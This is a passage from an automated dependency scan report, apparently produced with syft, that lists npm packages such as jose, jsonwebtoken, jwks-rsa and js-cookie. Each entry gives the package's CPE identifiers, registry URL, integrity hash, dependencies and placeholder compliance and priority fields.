cpe:2.3:a:jay:jay-peg:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jay:jay_peg:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/jay-peg@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jay-peg/-/jay-peg-1.1.1.tgz integrity: sha512-D62KEuBxz/ip2gQKOEhk/mx14o7eiFRaU+VNNSP4MOiIkwb/D6B3G1Mfas7C/Fit8EsSV2/IWjZElx/Gs6A4ww== dependencies: restructure: ^3.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5b403253da2d4e5e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jiti 1.21.7' title: jiti 1.21.7 description: 'Package discovered: jiti 1.21.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a3b57ee8874ce4dc name: jiti version: 1.21.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jiti:jiti:1.21.7:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/jiti@1.21.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz integrity: sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: feda20014c18c42e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jose 4.15.9' title: jose 4.15.9 description: 'Package discovered: jose 4.15.9' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0246497cf4065c27 name: jose version: 4.15.9 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jose_project:jose:4.15.9:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/jose@4.15.9 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jose/-/jose-4.15.9.tgz integrity: sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ad953d39f31a884d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: js-beautify 1.15.4' title: js-beautify 1.15.4 description: 'Package discovered: js-beautify 1.15.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: eb8b761fb0d3a989 name: js-beautify version: 1.15.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:js-beautify:js-beautify:1.15.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js-beautify:js_beautify:1.15.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_beautify:js-beautify:1.15.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_beautify:js_beautify:1.15.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js-beautify:1.15.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js_beautify:1.15.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/js-beautify@1.15.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/js-beautify/-/js-beautify-1.15.4.tgz integrity: sha512-9/KXeZUKKJwqCXUdBxFJ3vPh467OCckSBmYDwSK/EtV090K+iMJ7zx2S3HLVDIWFQdqMIsZWbnaGiba18aWhaA== dependencies: config-chain: ^1.1.13 editorconfig: ^1.0.4 glob: ^10.4.2 js-cookie: ^3.0.5 nopt: ^7.2.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cb31e7fb1004281e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: js-cookie 3.0.5' title: js-cookie 3.0.5 description: 'Package discovered: js-cookie 3.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 07274f4b8a4d661e name: js-cookie version: 3.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:js-cookie:js-cookie:3.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js-cookie:js_cookie:3.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_cookie:js-cookie:3.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_cookie:js_cookie:3.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js-cookie:3.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js_cookie:3.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/js-cookie@3.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz integrity: sha512-cEiJEAEoIbWfCZYKWhVwFuvPX1gETRYPw6LlaTKoxD3s2AkXzkCjnp6h0V77ozyqj0jakteJ4YqDJT830+lVGw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4db17fad932f2d8e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: js-md5 0.8.3' title: js-md5 0.8.3 description: 'Package discovered: js-md5 0.8.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d30adc61a99cb3ed name: js-md5 version: 0.8.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:js-md5:js-md5:0.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js-md5:js_md5:0.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_md5:js-md5:0.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_md5:js_md5:0.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js-md5:0.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js_md5:0.8.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/js-md5@0.8.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/js-md5/-/js-md5-0.8.3.tgz integrity: sha512-qR0HB5uP6wCuRMrWPTrkMaev7MJZwJuuw4fnwAzRgP4J4/F8RwtodOKpGp4XpqsLBFzzgqIO42efFAyz2Et6KQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 88f0214bae1b08f0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: js-tokens 4.0.0' title: js-tokens 4.0.0 description: 'Package discovered: js-tokens 4.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 132a500346fcea0c name: js-tokens version: 4.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:js-tokens:js-tokens:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js-tokens:js_tokens:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_tokens:js-tokens:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js_tokens:js_tokens:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js-tokens:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:js:js_tokens:4.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/js-tokens@4.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d7056e806f2cd1e3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: json-bigint 1.0.0' title: json-bigint 1.0.0 description: 'Package discovered: json-bigint 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f29c1976ad3d8cb0 name: json-bigint version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:json-bigint_project:json-bigint:1.0.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/json-bigint@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz integrity: sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ== dependencies: bignumber.js: ^9.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2a5374383b13cd28 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jsonwebtoken 9.0.3' title: jsonwebtoken 9.0.3 description: 'Package discovered: jsonwebtoken 9.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2ebcc52db7d200cb name: jsonwebtoken version: 9.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:auth0:jsonwebtoken:9.0.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/jsonwebtoken@9.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.3.tgz integrity: sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g== dependencies: jws: ^4.0.1 lodash.includes: ^4.3.0 lodash.isboolean: ^3.0.3 lodash.isinteger: ^4.0.4 lodash.isnumber: ^3.0.3 lodash.isplainobject: ^4.0.6 lodash.isstring: ^4.0.1 lodash.once: ^4.0.0 ms: ^2.1.1 semver: ^7.5.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 835e252fefb47867 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jwa 2.0.1' title: jwa 2.0.1 description: 'Package discovered: jwa 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 154697ca4fb19b8b name: jwa version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jwa:jwa:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/jwa@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg== dependencies: buffer-equal-constant-time: ^1.0.1 ecdsa-sig-formatter: 1.0.11 safe-buffer: ^5.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0c0a903cc4471d02 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jwks-rsa 3.2.2' title: jwks-rsa 3.2.2 description: 'Package discovered: jwks-rsa 3.2.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 014369d0efdc09b2 name: jwks-rsa version: 3.2.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jwks-rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jwks-rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jwks_rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jwks_rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jwks:jwks-rsa:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:jwks:jwks_rsa:3.2.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/jwks-rsa@3.2.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jwks-rsa/-/jwks-rsa-3.2.2.tgz integrity: sha512-BqTyEDV+lS8F2trk3A+qJnxV5Q9EqKCBJOPti3W97r7qTympCZjb7h2X6f2kc+0K3rsSTY1/6YG2eaXKoj497w== dependencies: '@types/jsonwebtoken': ^9.0.4 debug: ^4.3.4 jose: ^4.15.4 limiter: ^1.1.5 lru-memoizer: ^2.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5dd04dd82934e4bc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: jws 4.0.1' title: jws 4.0.1 description: 'Package discovered: jws 4.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7fed8e7a1bc916bb name: jws version: 4.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jws:jws:4.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/jws@4.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/jws/-/jws-4.0.1.tgz integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA== dependencies: jwa: ^2.0.1 safe-buffer: ^5.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fdd5e753a1967298 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: leac 0.6.0' title: leac 0.6.0 description: 'Package discovered: leac 0.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9ec1624bf944fe34 name: leac version: 0.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:leac:leac:0.6.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/leac@0.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/leac/-/leac-0.6.0.tgz integrity: sha512-y+SqErxb8h7nE/fiEX07jsbuhrpO9lL8eca7/Y1nuWV2moNlXhyd59iDGcRf6moVyDMbmTNzL40SUyrFU/yDpg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 63788a24cb56472a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lilconfig 3.1.3' title: lilconfig 3.1.3 description: 'Package discovered: lilconfig 3.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a8f0bd77b399e569 name: lilconfig version: 3.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lilconfig:lilconfig:3.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lilconfig@3.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lilconfig/-/lilconfig-3.1.3.tgz integrity: sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 90dd10f1ec21efdc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: limiter 1.1.5' title: limiter 1.1.5 description: 'Package discovered: limiter 1.1.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7ebb3add1191948c name: limiter version: 1.1.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:limiter:limiter:1.1.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/limiter@1.1.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/limiter/-/limiter-1.1.5.tgz integrity: sha512-FWWMIEOxz3GwUI4Ts/IvgVy6LPvoMPgjMdQ185nN6psJyBJ4yOpzqm695/h5umdLJg2vW3GR5iG11MAkR2AzJA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8108350690a84b91 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: linebreak 1.1.0' title: linebreak 1.1.0 description: 'Package discovered: linebreak 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 17b9850959841637 name: linebreak version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:linebreak:linebreak:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/linebreak@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/linebreak/-/linebreak-1.1.0.tgz integrity: sha512-MHp03UImeVhB7XZtjd0E4n6+3xr5Dq/9xI/5FptGk5FrbDR3zagPa2DS6U8ks/3HjbKWG9Q1M2ufOzxV2qLYSQ== dependencies: base64-js: 0.0.8 unicode-trie: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6d22d8e100269548 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lines-and-columns 1.2.4' title: lines-and-columns 1.2.4 description: 'Package discovered: lines-and-columns 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2f4d4f332c0f6687 name: lines-and-columns version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lines-and-columns:lines-and-columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines-and-columns:lines_and_columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines_and_columns:lines-and-columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines_and_columns:lines_and_columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines-and:lines-and-columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines-and:lines_and_columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines_and:lines-and-columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines_and:lines_and_columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines:lines-and-columns:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lines:lines_and_columns:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lines-and-columns@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz integrity: sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 99a30188145ce555 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: locate-path 5.0.0' title: locate-path 5.0.0 description: 'Package discovered: locate-path 5.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e6b383b17df8c845 name: locate-path version: 5.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:locate-path:locate-path:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:locate-path:locate_path:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:locate_path:locate-path:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:locate_path:locate_path:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:locate:locate-path:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:locate:locate_path:5.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/locate-path@5.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz integrity: sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g== dependencies: p-locate: ^4.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: 